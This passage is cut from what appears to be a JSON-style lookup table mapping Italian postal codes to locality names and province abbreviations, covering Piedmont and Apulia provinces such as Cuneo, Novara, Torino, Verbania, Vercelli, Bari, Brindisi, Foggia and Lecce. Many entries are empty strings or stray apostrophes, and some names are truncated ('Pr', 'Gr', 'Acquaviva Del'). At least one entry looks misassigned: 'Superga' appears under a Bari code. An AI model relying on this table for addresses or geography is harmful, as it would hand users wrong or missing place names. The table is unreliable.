["", "CN"], ["Roburent", "CN"], ["'", "CN"], ["'", "CN"], ["Briaglia", "CN"], ["Pianfei", "CN"], ["Moline", "CN"], ["", "CN"], ], "12081": [["Beinette", "CN"]], "12082": [["Frabosa Soprana", "CN"], ["Bossea", "CN"], ["Fontane", "CN"], ["Corsaglia", "CN"]], "12083": [["", "CN"], ["Gosi", "CN"], ["Frabosa Sottana", "CN"]], "12084": [ ["Pogliola", "CN"], ["Breo", "CN"], ["Gratteria", "CN"], ["Breolungi", "CN"], ["", "CN"], ["Piazza", "CN"], ["'", "CN"], ["Pascomonti", "CN"], ["Mondovi'", "CN"], 
], "12087": [["Valcasotto", "CN"], ["Pamparato", "CN"], ["Serra", "CN"], ["Serra Pamparato", "CN"]], "12088": [["'", "CN"], ["Lurisia", "CN"], ["Prea", "CN"], ["Prea Di Roccaforte", "CN"]], "12089": [["'", "CN"]], "12100": [ ["", "CN"], ["Passatore", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["San ", "CN"], ["Confreria", "CN"], ["", "CN"], ["Spinetta", "CN"], ["'Olmo", "CN"], ["Ronchi", "CN"], ["Cuneo", "CN"], ["", "CN"], ], "28010": [ ["", "NO"], ["Boca", "NO"], ["Bogogno", "NO"], ["Cavallirio", "NO"], ["Revislate", "NO"], ["", "NO"], ["Miasino", "NO"], ["Gargallo", "NO"], ["Alzo", "NO"], ["Soriso", "NO"], ["", "NO"], ["Cavaglietto", "NO"], ["Pisano", "NO"], ["Sologno", "NO"], ["Barengo", "NO"], ["Ameno", "NO"], ["", "NO"], ["", "NO"], ["Nebbiuno", "NO"], ["Caltignaga", "NO"], ["", "NO"], ["Pella", "NO"], ["Divignano", "NO"], ["Colazza", "NO"], ], "28011": [["Coiromonte", "NO"], ["Armeno", "NO"], ["Sovazza", "NO"]], "28012": [["Cressa", "NO"]], "28013": [["Veruno", "NO"], ["Gattico", "NO"]], "28014": [["Maggiora", "NO"]], "28015": [["Momo", "NO"]], "28016": [["", "NO"], ["", "NO"], ["", "NO"]], "28017": [["", "NO"]], "28019": [["Suno", "NO"], ["Baraggia", "NO"]], "28021": [ ["Borgomanero", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ], "28024": [["Gozzano", "NO"]], "28028": [["Pratolungo", "NO"], ["Pettenasco", "NO"]], "28040": [ ["", "NO"], ["Lesa", "NO"], ["Dormelletto", "NO"], ["Paruzzaro", "NO"], ["", "NO"], ["Mezzomerico", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ], "28041": [["Arona", "NO"], ["Dagnente", "NO"], ["Mercurago", "NO"]], "28043": [["", "NO"]], "28045": [["Invorio", "NO"]], "28046": [["Ghevio", "NO"], ["Meina", "NO"]], "28047": [["Oleggio", "NO"], ["Fornaci", "NO"]], "28050": [["Pombia", "NO"]], "28053": [["", "NO"]], "28060": [ ["Vinzaglio", "NO"], ["", "NO"], ["Casalvolone", "NO"], ["Granozzo", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ["Orfengo", "NO"], ["Nibbia", "NO"], ["", "NO"], ["Sozzago", "NO"], ["Cameriano", "NO"], ["Vicolungo", "NO"], ["Cureggio", "NO"], ["Casalbeltrame", "NO"], ["Recetto", "NO"], ["", "NO"], ["Comignago", "NO"], ["Casalino", "NO"], ], "28061": [["Biandrate", "NO"]], "28062": [["", "NO"], ["Cameri", "NO"]], "28064": [["Sillavengo", "NO"], ["", "NO"], ["Landiona", "NO"]], "28065": [["Cerano", "NO"]], "28066": [["Galliate", "NO"]], "28068": [["Romentino", "NO"]], "28069": [["Trecate", "NO"]], "28070": [ ["Sizzano", "NO"], ["", "NO"], ["Nibbiola", "NO"], ["Tornaco", "NO"], ["Terdobbiate", "NO"], ], "28071": [["Borgolavezzaro", "NO"]], "28072": [["San Bernardino", "NO"], ["Briona", "NO"]], "28073": [["", "NO"]], "28074": [["Ghemme", "NO"]], "28075": [["Grignasco", "NO"]], "28076": [["Pogno", "NO"]], "28077": [["Pr", "NO"]], "28078": [["", "NO"]], "28079": [["Vespolate", "NO"]], "28100": [ ["Veveri", "NO"], ["Vignale", "NO"], ["Olengo", "NO"], ["", "NO"], ["", "NO"], ["Agognate", "NO"], ["Sant'Agabio", "NO"], ["Casalgiate", "NO"], ["Novara", "NO"], ["Lumellogno", "NO"], ["Pernate", "NO"], ], "10010": [ ["", "TO"], ["", "TO"], ["Banchette", "TO"], ["Lessolo", "TO"], ["Bairo", "TO"], ["", "TO"], ["Parella", "TO"], ["Tavagnasco", "TO"], ["", "TO"], ["Nomaglio", "TO"], ["", "TO"], ["Quagliuzzo", "TO"], ["", "TO"], ["", "TO"], ["Burolo", "TO"], ["Calea", "TO"], ["Mercenasco", "TO"], ["Quassolo", "TO"], ["", "TO"], ["Masino", "TO"], ["Andrate", "TO"], ["", "TO"], ["Quincinetto", "TO"], ["Strambinello", "TO"], ["", "TO"], ["Carema", "TO"], ["Azeglio", "TO"], ["Gauna", "TO"], ["Piverone", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Villate", "TO"], ["", 
"TO"], ["", "TO"], ["Caravino", "TO"], ["Scarmagno", "TO"], ["Chiaverano", "TO"], ["Loranze'", "TO"], ["Rueglio", "TO"], ], "10011": [["Aglie'", "TO"]], "10012": [["Bollengo", "TO"]], "10013": [["", "TO"], ["", "TO"]], "10014": [["Caluso", "TO"], ["", "TO"], ["Vallo", "TO"], ["Are'", "TO"], ["Rodallo", "TO"]], "10015": [["", "TO"], ["", "TO"], ["Ivrea", "TO"]], "10016": [["", "TO"]], "10017": [["Montanaro", "TO"]], "10018": [["", "TO"]], "10019": [["Strambino", "TO"], ["Cerone", "TO"], ["Carrone", "TO"]], "10020": [ ["", "TO"], ["", "TO"], ["Marcorengo", "TO"], ["Cavagnolo", "TO"], ["Colombaro", "TO"], ["", "TO"], ["", "TO"], ["Brusasco", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Arignano", "TO"], ["", "TO"], ["Lauriano", "TO"], ["", "TO"], ["Brozolo", "TO"], ["Pavarolo", "TO"], ["Marentino", "TO"], ["Andezeno", "TO"], ["", "TO"], ["Cambiano", "TO"], ["", "TO"], ["Casalborgone", "TO"], ["Rivodora", "TO"], ], "10022": [ ["Cavalleri", "TO"], ["Carmagnola", "TO"], ["Fumeri", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ], "10023": [["Chieri", "TO"], ["Pessione", "TO"]], "10024": [ ["Moncalieri", "TO"], ["Revigliasco", "TO"], ["Tagliaferro", "TO"], ["Barauda", "TO"], ["", "TO"], ["Testona", "TO"], ["", "TO"], ["", "TO"], ], "10025": [["", "TO"]], "10026": [["Santena", "TO"]], "10028": [["", "TO"], ["Trofarello", "TO"]], "10029": [["Villastellone", "TO"]], "10030": [ ["Maglione", "TO"], ["Vische", "TO"], ["Tina", "TO"], ["Rondissone", "TO"], ["Vestigne'", "TO"], ["Villareggia", "TO"], ], "10031": [["Borgomasino", "TO"]], "10032": [["Brandizzo", "TO"]], "10034": [["Boschetto", "TO"], ["Chivasso", "TO"], ["Torassi", "TO"], ["Castelrosso", "TO"]], "10035": [["Casale", "TO"], ["Mazze'", "TO"], ["'", "TO"]], "10036": [["Olimpia", "TO"], ["", "TO"]], "10037": [["", "TO"]], "10038": [["Verolengo", "TO"], ["Casabianca", "TO"], ["", "TO"]], "10039": [["Pecco", "TO"], ["Lugnacco", "TO"], ["", "TO"]], "10040": [ ["", "TO"], ["Rivarossa", "TO"], ["Rivera", "TO"], ["", "TO"], ["Milanere", "TO"], ["Tedeschi", "TO"], ["", "TO"], ["Givoletto", "TO"], ["", "TO"], ["Caselette", "TO"], ["Gerbole", "TO"], ["Montelera", "TO"], ["Zucche", "TO"], ["Druento", "TO"], ["Rubiana", "TO"], ["Cumiana", "TO"], ["", "TO"], ["Leini'", "TO"], ["Lombardore", "TO"], ["Almese", "TO"], ["Novaretto", "TO"], ["", "TO"], ["", "TO"], ["Brione", "TO"], ["", "TO"], ["Osasio", "TO"], ["Caprie", "TO"], ["Pralormo", "TO"], ["Lombriasco", "TO"], ["Volvera", "TO"], ], "10041": [["Carignano", "TO"], ["", "TO"], ["Ceretto", "TO"]], "10042": [["Stupinigi", "TO"], ["Nichelino", "TO"]], "10043": [["Orbassano", "TO"]], "10044": [["Pianezza", "TO"]], "10045": [["Piossasco", "TO"], ["Garola", "TO"]], "10046": [["Marocchi", "TO"], ["Avatanei", "TO"], ["Isolabella", "TO"], ["Poirino", "TO"], ["Favari", "TO"]], "10048": [["Vinovo", "TO"], ["Garino", "TO"]], "10050": [ ["", "TO"], ["Coazze", "TO"], ["", "TO"], ["", "TO"], ["Chiomonte", "TO"], ["", "TO"], ["Baratte", "TO"], ["Chianocco", "TO"], ["Vernetto", "TO"], ["", "TO"], ["Novalesa", "TO"], ["", "TO"], ["Zoie", "TO"], ["Claviere", "TO"], ["", "TO"], ["Giaglione", "TO"], ["Venaus", "TO"], ["", "TO"], ["Mattie", "TO"], ["Gravere", "TO"], ["", "TO"], ["Exilles", "TO"], ["Vaie", "TO"], ["", "TO"], ["Moncenisio", "TO"], ["Salbertrand", "TO"], ["Bruzolo", "TO"], ], "10051": [["Drubiaglio", "TO"], ["Grangia", "TO"], ["Avigliana", "TO"]], "10052": [["Bardonecchia", "TO"], ["", "TO"]], "10053": [["Foresto", "TO"], ["Bussoleno", "TO"]], "10054": [["Bousson", "TO"], ["", "TO"], ["Solomiac", "TO"], ["", "TO"]], 
"10055": [["Condove", "TO"]], "10056": [["Beaulard", "TO"], ["Oulx", "TO"]], "10057": [["", "TO"]], "10058": [["Sestriere", "TO"], ["", "TO"]], "10059": [["Mompantero", "TO"], ["", "TO"], ["Susa", "TO"]], "10060": [ ["Bibiana", "TO"], ["Bricherasio", "TO"], ["", "TO"], ["Rora'", "TO"], ["Combalere", "TO"], ["Cantalupa", "TO"], ["Airasca", "TO"], ["Roletto", "TO"], ["", "TO"], ["Pragelato", "TO"], ["Campiglione", "TO"], ["Scalenghe", "TO"], ["", "TO"], ["Macello", "TO"], ["Pancalieri", "TO"], ["Mentoulles", "TO"], ["None", "TO"], ["Villaretto", "TO"], ["Candiolo", "TO"], ["", "TO"], ["Roure", "TO"], ["Perrero", "TO"], ["Dubbione", "TO"], ["Piscina", "TO"], ["Prarostino", "TO"], ["Angrogna", "TO"], ["Miradolo", "TO"], ["Garzigliana", "TO"], ["Frossasco", "TO"], ["Massello", "TO"], ["", "TO"], ["Roreto", "TO"], ["Riclaretto", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Buriasco", "TO"], ["Viotto", "TO"], ["Prali", "TO"], ["Osasco", "TO"], ["", "TO"], ["Fenestrelle", "TO"], ["Pinasca", "TO"], ["Castelnuovo", "TO"], ["", "TO"], ["Cercenasco", "TO"], ["", "TO"], ["", "TO"], ["Usseaux", "TO"], ["Porte", "TO"], ["Lusernetta", "TO"], ["", "TO"], ], "10061": [["Cavour", "TO"]], "10062": [["Airali", "TO"], ["Luserna", "TO"], ["", "TO"]], "10063": [["", "TO"], ["Pomaretto", "TO"]], "10064": [["", "TO"], ["", "TO"], ["Pinerolo", "TO"], ["Baudenasca", "TO"]], "10065": [["", "TO"], ["Pramollo", "TO"]], "10066": [["", "TO"]], "10067": [["Vigone", "TO"]], "10068": [["", "TO"]], "10069": [["", "TO"]], "10070": [ ["Fiano", "TO"], ["Levone", "TO"], ["", "TO"], ["Benne", "TO"], ["", "TO"], ["", "TO"], ["Front", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Ceres", "TO"], ["'", "TO"], ["Varisella", "TO"], ["Corio", "TO"], ["Mezzenile", "TO"], ["Cantoira", "TO"], ["", "TO"], ["Mondrone", "TO"], ["", "TO"], ["", "TO"], ["Lemie", "TO"], ["", "TO"], ["Bonzo", "TO"], ["Pessinetto", "TO"], ["Germagnano", "TO"], ["Balangero", "TO"], ["Monasterolo", "TO"], ["Cafasse", "TO"], ["Traves", "TO"], ["Viu'", "TO"], ["Procaria", "TO"], ["", "TO"], ["Groscavallo", "TO"], ["Grosso", "TO"], ["Usseglio", "TO"], ["", "TO"], ["Balme", "TO"], ["Robassomero", "TO"], ["Barbania", "TO"], ["Chialamberto", "TO"], ], "10071": [["", "TO"]], "10072": [["", "TO"], ["Mappano", "TO"]], "10073": [["Devesi", "TO"], ["Cirie'", "TO"]], "10074": [["", "TO"]], "10075": [["Mathi", "TO"]], "10076": [["", "TO"], ["Nole", "TO"]], "10077": [["Malanghero", "TO"], ["", "TO"], ["", "TO"]], "10078": [["", "TO"], ["Altessano", "TO"]], "10080": [ ["Rosone", "TO"], ["Ciconio", "TO"], ["", "TO"], ["Sparone", "TO"], ["Lusiglie'", "TO"], ["", "TO"], ["Oglianico", "TO"], ["", "TO"], ["Cintano", "TO"], ["Fornolosa", "TO"], ["Alpette", "TO"], ["Drusacco", "TO"], ["Pratiglione", "TO"], ["Ozegna", "TO"], ["Traversella", "TO"], ["Casetti", "TO"], ["Ingria", "TO"], ["", "TO"], ["", "TO"], ["Vistrorio", "TO"], ["", "TO"], ["", "TO"], ["Ribordone", "TO"], ["Bosconero", "TO"], ["Canischio", "TO"], ["Salassa", "TO"], ["Brosso", "TO"], ["Noasca", "TO"], ["Locana", "TO"], ["", "TO"], ["Frassinetto", "TO"], ["Pertusio", "TO"], ["Prascorsano", "TO"], ["Vidracco", "TO"], ["Chiesanuova", "TO"], ["Feletto", "TO"], ["Issiglio", "TO"], ["", "TO"], ["Busano", "TO"], ["", "TO"], ["Rivara", "TO"], ["Borgiallo", "TO"], ], "10081": [ ["", "TO"], ["", "TO"], ["Muriaglio", "TO"], ["Castellamonte", "TO"], ], "10082": [["Priacco", "TO"], ["", "TO"], ["Cuorgne'", "TO"]], "10083": [["Favria", "TO"]], "10084": [["", "TO"]], "10085": [["", "TO"]], "10086": [["Argentera", 
"TO"], ["", "TO"]], "10087": [["Valperga", "TO"]], "10088": [["Volpiano", "TO"]], "10089": [["", "TO"], ["Trausella", "TO"], ["Meugliano", "TO"]], "10090": [ ["", "TO"], ["", "TO"], ["Bussolino", "TO"], ["Sciolze", "TO"], ["Rivalba", "TO"], ["", "TO"], ["", "TO"], ["Trana", "TO"], ["Cinzano", "TO"], ["Foglizzo", "TO"], ["Sangano", "TO"], ["Bruino", "TO"], ["", "TO"], ["Reano", "TO"], ["Cuceglio", "TO"], ["Vialfre'", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Villarbasse", "TO"], ["", "TO"], ["Montalenghe", "TO"], ["", "TO"], ["Rosta", "TO"], ["Corbiglia", "TO"], ["", "TO"], ["Ferriera", "TO"], ], "10091": [["Alpignano", "TO"]], "10092": [["Borgaretto", "TO"], ["Beinasco", "TO"]], "10093": [ ["Leumann", "TO"], ["Savonera", "TO"], ["Collegno", "TO"], ["", "TO"], ["", "TO"], ], "10094": [["Valgioie", "TO"], ["Pontepietra", "TO"], ["Giaveno", "TO"], ["Selvaggio", "TO"]], "10095": [["Gerbido", "TO"], ["Lesna", "TO"], ["Grugliasco", "TO"]], "10098": [["", "TO"], ["Rivoli", "TO"], ["Bruere", "TO"], ["", "TO"]], "10099": [["", "TO"]], "10100": [["Torino", "TO"]], "10121": [["Torino", "TO"]], "10122": [["Torino", "TO"]], "10123": [["Torino", "TO"]], "10124": [["Torino", "TO"]], "10125": [["Torino", "TO"]], "10126": [["Torino", "TO"]], "10127": [["Torino", "TO"]], "10128": [["Torino", "TO"]], "10129": [["Torino", "TO"]], "10131": [["Torino", "TO"]], "10132": [["Superga", "TO"], ["Torino", "TO"]], "10133": [["Torino", "TO"], ["Cavoretto", "TO"]], "10134": [["Torino", "TO"]], "10135": [["Torino", "TO"]], "10136": [["Torino", "TO"]], "10137": [["Torino", "TO"]], "10138": [["Torino", "TO"]], "10139": [["Torino", "TO"]], "10141": [["Torino", "TO"]], "10142": [["Torino", "TO"]], "10143": [["Torino", "TO"]], "10144": [["Torino", "TO"]], "10145": [["Torino", "TO"]], "10146": [["Torino", "TO"]], "10147": [["Torino", "TO"]], "10148": [["Torino", "TO"]], "10149": [["Torino", "TO"]], "10151": [["Torino", "TO"]], "10152": [["Torino", "TO"]], "10153": [["Torino", "TO"]], "10154": [["Torino", "TO"]], "10155": [["Torino", "TO"]], "10156": [["", "TO"], ["Torino", "TO"], ["Falchera", "TO"]], "28801": [["Cossogno", "VB"]], "28802": [["Albo", "VB"], ["Mergozzo", "VB"]], "28803": [["", "VB"], ["Cuzzago", "VB"]], "28804": [["", "VB"], ["Bieno", "VB"]], "28805": [["Vogogna", "VB"]], "28811": [["Cissano", "VB"], ["Cresseglio", "VB"], ["Arizzano", "VB"]], "28812": [["Aurano", "VB"]], "28813": [["Bee", "VB"]], "28814": [["Cambiasca", "VB"]], "28815": [["Caprezzo", "VB"]], "28816": [["Intragna", "VB"]], "28817": [["Miazzina", "VB"]], "28818": [["Premeno", "VB"]], "28819": [["Vignone", "VB"]], "28821": [["", "VB"]], "28822": [["Cannobio", "VB"]], "28823": [["Ghiffa", "VB"], ["Susello", "VB"], ["Cargiago", "VB"]], "28824": [["Gonte", "VB"], ["Oggebbio", "VB"]], "28825": [["", "VB"]], "28826": [["", "VB"]], "28827": [["", "VB"], ["", "VB"], ["Falmenta", "VB"], ["Airetta", "VB"]], "28828": [["Gurro", "VB"]], "28831": [["", "VB"], ["Feriolo", "VB"], ["Baveno", "VB"]], "28832": [["Belgirate", "VB"]], "28833": [["", "VB"]], "28836": [["Gignese", "VB"], ["Vezzo", "VB"]], "28838": [ ["Binda", "VB"], ["Levo", "VB"], ["Carciano", "VB"], ["", "VB"], ["Magognino", "VB"], ["Stresa", "VB"], ], "28841": [["", "VB"], ["Antronapiana", "VB"]], "28842": [["Fonti", "VB"], ["", "VB"], ["Bognanco", "VB"]], "28843": [["Montescheno", "VB"]], "28844": [["Villadossola", "VB"]], "28845": [["Domodossola", "VB"]], "28846": [["Viganella", "VB"], ["Seppiana", "VB"]], "28851": [["Cuzzego", "VB"], ["Beura", "VB"], ["", "VB"]], "28852": [["Craveggia", "VB"], 
["Vocogno", "VB"]], "28853": [["Druogno", "VB"]], "28854": [["Malesco", "VB"], ["Zornasco", "VB"], ["Finero", "VB"]], "28855": [["Masera", "VB"]], "28856": [["Re", "VB"], ["Villette", "VB"]], "28857": [["", "VB"]], "28858": [["Toceno", "VB"]], "28859": [["Trontano", "VB"]], "28861": [["Baceno", "VB"]], "28862": [["Crodo", "VB"]], "28863": [["Formazza", "VB"]], "28864": [["Roldo", "VB"], ["Montecrestese", "VB"], ["Pontetto", "VB"]], "28865": [["Preglia", "VB"], ["Crevoladossola", "VB"]], "28866": [["Premia", "VB"], ["", "VB"]], "28868": [["Iselle", "VB"], ["Trasquera", "VB"], ["Varzo", "VB"]], "28871": [["", "VB"]], "28873": [["", "VB"], ["", "VB"], ["Castiglione", "VB"]], "28875": [["", "VB"]], "28876": [["Pestarena", "VB"], ["Borca", "VB"], ["", "VB"], ["Macugnaga", "VB"]], "28877": [["", "VB"], ["Ornavasso", "VB"]], "28879": [["", "VB"], ["", "VB"]], "28881": [ ["Cereda", "VB"], ["Ramate", "VB"], ["Sant'Anna", "VB"], ["", "VB"], ["Gabbio", "VB"], ["", "VB"], ], "28883": [["Granerolo", "VB"], ["", "VB"], ["Pedemonte", "VB"]], "28884": [["Pallanzeno", "VB"]], "28885": [["Piedimulera", "VB"]], "28886": [["", "VB"]], "28887": [ ["Cireggio", "VB"], ["Crusinallo", "VB"], ["Omegna", "VB"], ["Bagnella", "VB"], ["Germagno", "VB"], ["Agrano", "VB"], ], "28891": [["Nonio", "VB"], ["Cesara", "VB"]], "28893": [["Loreglia", "VB"]], "28894": [["", "VB"]], "28895": [["", "VB"], ["Massiola", "VB"]], "28896": [["", "VB"]], "28897": [["Fornero", "VB"], ["Luzzogno", "VB"], ["Valstrona", "VB"], ["Sambughetto", "VB"]], "28898": [["", "VB"]], "28899": [["Arola", "VB"]], "28922": [["Verbania", "VB"]], "13010": [ ["Civiasco", "VC"], ["Caresana", "VC"], ["Postua", "VC"], ["Villata", "VC"], ["Guardabosone", "VC"], ["Motta De' Conti", "VC"], ["Stroppiana", "VC"], ["Pezzana", "VC"], ], "13011": [["", "VC"], ["Isolella", "VC"], ["Borgosesia", "VC"]], "13012": [["", "VC"], ["Prarolo", "VC"]], "13017": [["Quarona", "VC"], ["Doccio", "VC"]], "13018": [["Valduggia", "VC"], ["Zuccaro", "VC"]], "13019": [["Morca", "VC"], ["Valmaggia", "VC"], ["Varallo", "VC"], ["Roccapietra", "VC"]], "13020": [ ["Sabbia", "VC"], ["Mollia", "VC"], ["Balmuccia", "VC"], ["Rimella", "VC"], ["Breia", "VC"], ["Rassa", "VC"], ["Vocca", "VC"], ["Rossa", "VC"], ["Piode", "VC"], ["Cravagliana", "VC"], ["Ferrera", "VC"], ["", "VC"], ["Pila", "VC"], ], "13021": [["", "VC"], ["", "VC"]], "13022": [["Fervento", "VC"], ["Boccioleto", "VC"]], "13023": [["Campertogno", "VC"]], "13024": [["Cellio", "VC"]], "13025": [["Fobello", "VC"], ["Cervatto", "VC"]], "13026": [["Carcoforo", "VC"], ["", "VC"], ["Rimasco", "VC"]], "13027": [["Scopa", "VC"]], "13028": [["Scopello", "VC"]], "13030": [ ["", "VC"], ["", "VC"], ["Villarboit", "VC"], ["Rive", "VC"], ["Oldenico", "VC"], ["Ghislarengo", "VC"], ["Greggio", "VC"], ["Caresanablot", "VC"], ["", "VC"], ["Collobiano", "VC"], ["Pertengo", "VC"], ["", "VC"], ["Formigliana", "VC"], ], "13031": [["Arborio", "VC"]], "13032": [["", "VC"]], "13033": [["Costanzana", "VC"]], "13034": [["Desana", "VC"], ["Lignana", "VC"]], "13035": [["Lenta", "VC"]], "13036": [["Ronsecco", "VC"]], "13037": [["", "VC"], ["Vintebbio", "VC"], ["", "VC"]], "13038": [["Tricerro", "VC"]], "13039": [["Trino", "VC"]], "13040": [ ["Crova", "VC"], ["Moncrivello", "VC"], ["Buronzo", "VC"], ["", "VC"], ["Rovasenda", "VC"], ["", "VC"], ["", "VC"], ["Salasco", "VC"], ["", "VC"], ["", "VC"], ["Saluggia", "VC"], ["", "VC"], ["Balocco", "VC"], ["Sant'Antonino", "VC"], ["Carisio", "VC"], ], "13041": [["Bianze'", "VC"]], "13043": [["Cigliano", "VC"]], "13044": 
[["Crescentino", "VC"], ["", "VC"], ["", "VC"]], "13045": [["Lozzolo", "VC"], ["Gattinara", "VC"]], "13046": [["Lamporo", "VC"], ["", "VC"]], "13047": [["Olcenengo", "VC"], ["", "VC"]], "13048": [["Santhia'", "VC"]], "13049": [["", "VC"]], "13060": [["", "VC"], ["Roasio", "VC"], ["Sant'Eusebio", "VC"]], "13100": [ ["Vercelli", "VC"], ["Cappuccini", "VC"], ["Prarolo", "VC"], ["Lignana", "VC"], ["Brarola", "VC"], ["Larizzate", "VC"], ], "70010": [ ["Capurso", "BA"], ["Adelfia", "BA"], ["", "BA"], ["", "BA"], ["Cellamare", "BA"], ["Locorotondo", "BA"], ["Casamassima", "BA"], ["", "BA"], ["", "BA"], ["Superga", "BA"], ["Turi", "BA"], ["Valenzano", "BA"], ["", "BA"], ["Trito", "BA"], ], "70011": [["Coreggia", "BA"], ["Alberobello", "BA"]], "70013": [["", "BA"]], "70014": [["Triggianello", "BA"], ["Conversano", "BA"]], "70015": [["Lamadacqua", "BA"], ["Noci", "BA"]], "70016": [["Parchitello", "BA"], ["Noicattaro", "BA"], ["", "BA"]], "70017": [["San Michele In Monte Laureto", "BA"], ["Putignano", "BA"], ["San Pietro Piturno", "BA"]], "70018": [["Rutigliano", "BA"]], "70019": [["Triggiano", "BA"]], "70020": [ ["Bitetto", "BA"], ["", "BA"], ["Poggiorsini", "BA"], ["Binetto", "BA"], ["Bitritto", "BA"], ["Toritto", "BA"], ], "70021": [["Acquaviva Del", "BA"]], "70022": [["Altamura", "BA"], ["Curtaniello", "BA"], ["Parisi", "BA"]], "70023": [["Murgia", "BA"], ["", "BA"]], "70024": [["Gravina In Puglia", "BA"], ["Murgetta", "BA"], ["Dolcecanto", "BA"], ["La Murgetta", "BA"]], "70025": [["Gr", "BA"]], "70026": [["Modugno", "BA"]], "70027": [["Palo Del Colle", "BA"]], "70028": [["", "BA"]], "70029": [["Santeramo In Colle", "BA"]], "70032": [["Bitonto", "BA"], ["Mariotto", "BA"], ["Palombaio", "BA"]], "70033": [["Corato", "BA"]], "70037": [["", "BA"]], "70038": [["Terlizzi", "BA"]], "70042": [["", "BA"], ["", "BA"], ["Cozze", "BA"]], "70043": [ ["Antonelli", "BA"], ["Impalata", "BA"], ["Lamalunga", "BA"], ["Gorgofreddo", "BA"], ["Cozzana", "BA"], ["", "BA"], ["", "BA"], ["Monopoli", "BA"], ], "70044": [["", "BA"]], "70054": [["Giovinazzo", "BA"]], "70056": [["Molfetta", "BA"]], "70100": [["Bari", "BA"]], "70121": [["Bari", "BA"]], "70122": [["Bari", "BA"]], "70123": [ ["Bari", "BA"], ["", "BA"], ["Fesca", "BA"], ["", "BA"], ["Stanic", "BA"], ["", "BA"], ["", "BA"], ], "70124": [["Picone", "BA"], ["", "BA"], ["Bari", "BA"]], "70125": [["Bari", "BA"], ["", "BA"], ["Carrassi", "BA"]], "70126": [["Mungivacca", "BA"], ["Japigia", "BA"], ["Bari", "BA"], ["", "BA"]], "70127": [["Santo Spirito", "BA"]], "70128": [["Palese", "BA"]], "70129": [["Loseto", "BA"], ["", "BA"]], "70131": [["", "BA"]], "72012": [["Carovigno", "BR"], ["", "BR"], ["Serranova", "BR"]], "72013": [["", "BR"]], "72014": [["Cisternino", "BR"], ["Caranna", "BR"], ["Casalini", "BR"]], "72015": [ ["Savelletri", "BR"], ["", "BR"], ["Montalbano", "BR"], ["", "BR"], ["", "BR"], ["", "BR"], ["Selva", "BR"], ["", "BR"], ["Fasano", "BR"], ["", "BR"], ["", "BR"], ], "72016": [["", "BR"], ["", "BR"]], "72017": [["Ostuni", "BR"]], "72018": [["", "BR"]], "72019": [["", "BR"]], "72020": [["", "BR"], ["Torchiarolo", "BR"], ["Erchie", "BR"], ["Tuturano", "BR"]], "72021": [["", "BR"], ["", "BR"], ["Capece", "BR"]], "72022": [["Latiano", "BR"]], "72023": [["Mesagne", "BR"]], "72024": [["Oria", "BR"], ["", "BR"], ["", "BR"]], "72025": [["", "BR"]], "72026": [["", "BR"]], "72027": [["", "BR"]], "72028": [["", "BR"]], "72029": [["", "BR"]], "72100": [["Brindisi Casale", "BR"], ["Brindisi", "BR"]], "76011": [["Bisceglie", "BT"]], "76012": [["", "BT"], ["Loconia", 
"BT"]], "76013": [["", "BT"]], "76014": [["Spinazzola", "BT"]], "76015": [["Trinitapoli", "BT"]], "76016": [["", "BT"]], "76017": [["", "BT"]], "76121": [["Barletta", "BT"]], "76123": [["Montegrosso", "BT"], ["Andria", "BT"]], "76125": [["Trani", "BT"]], "71010": [ ["", "FG"], ["", "FG"], ["", "FG"], ["Carpino", "FG"], ["Serracapriola", "FG"], ["Ischitella", "FG"], ["", "FG"], ["Ripalta", "FG"], ["Difensola", "FG"], ["Lesina", "FG"], ["", "FG"], ["", "FG"], ["Chieuti", "FG"], ["Peschici", "FG"], ], "71011": [["Apricena", "FG"]], "71012": [["", "FG"]], "71013": [["", "FG"], ["Matine", "FG"]], "71014": [["", "FG"], ["", "FG"]], "71015": [["", "FG"]], "71016": [["", "FG"]], "71017": [["Petrulli", "FG"], ["Torremaggiore", "FG"]], "71018": [["Umbra", "FG"], ["", "FG"], ["", "FG"]], "71019": [["Vieste", "FG"]], "71020": [ ["", "FG"], ["", "FG"], ["Faeto", "FG"], ["", "FG"], ["", "FG"], ["Panni", "FG"], ["", "FG"], ["", "FG"], ], "71021": [["Accadia", "FG"]], "71022": [["", "FG"], ["", "FG"], ["", "FG"]], "71023": [["Bovino", "FG"]], "71024": [["Candela", "FG"]], "71025": [["", "FG"]], "71026": [["Deliceto", "FG"]], "71027": [["", "FG"]], "71028": [["", "FG"]], "71029": [["", "FG"], ["Troia", "FG"]], "71030": [ ["", "FG"], ["", "FG"], ["", "FG"], ["Zapponeta", "FG"], ["Carlantino", "FG"], ["Volturino", "FG"], ["Fonterosa", "FG"], ["Macchia", "FG"], ["Mattinata", "FG"], ["", "FG"], ], "71031": [["Alberona", "FG"]], "71032": [["Biccari", "FG"], ["Berardinone", "FG"]], "71033": [["", "FG"]], "71034": [["", "FG"]], "71035": [["", "FG"]], "71036": [["Lucera", "FG"], ["Palmori", "FG"]], "71037": [["", "FG"]], "71038": [["Pietramontecorvino", "FG"]], "71039": [["", "FG"]], "71040": [ ["", "FG"], ["", "FG"], ["Ordona", "FG"], ["", "FG"], ["", "FG"], ["Mezzanone", "FG"], ["", "FG"], ], "71041": [["Carapelle", "FG"]], "71042": [ ["'", "FG"], ["Cerignola", "FG"], ["", "FG"], ["", "FG"], ["Tressanti", "FG"], ["Moschella", "FG"], ], "71043": [["Siponto", "FG"], ["Manfredonia", "FG"]], "71045": [["Orta Nova", "FG"]], "71047": [["Stornara", "FG"]], "71048": [["Stornarella", "FG"]], "71100": [ ["Incoronata", "FG"], ["Tavernola", "FG"], ["Arpinova", "FG"], ["", "FG"], ["Segezia", "FG"], ["Foggia", "FG"], ["", "FG"], ["", "FG"], ["Cervaro", "FG"], ], "73010": [ ["Lequile", "LE"], ["", "LE"], ["Dragoni", "LE"], ["Sternatia", "LE"], ["", "LE"], ["", "LE"], ["Riesci", "LE"], ["Veglie", "LE"], ["", "LE"], ["", "LE"], ["", "LE"], ["Zollino", "LE"], ["", "LE"], ["Arnesano", "LE"], ["Galugnano", "LE"], ["Surbo", "LE"], ["Soleto", 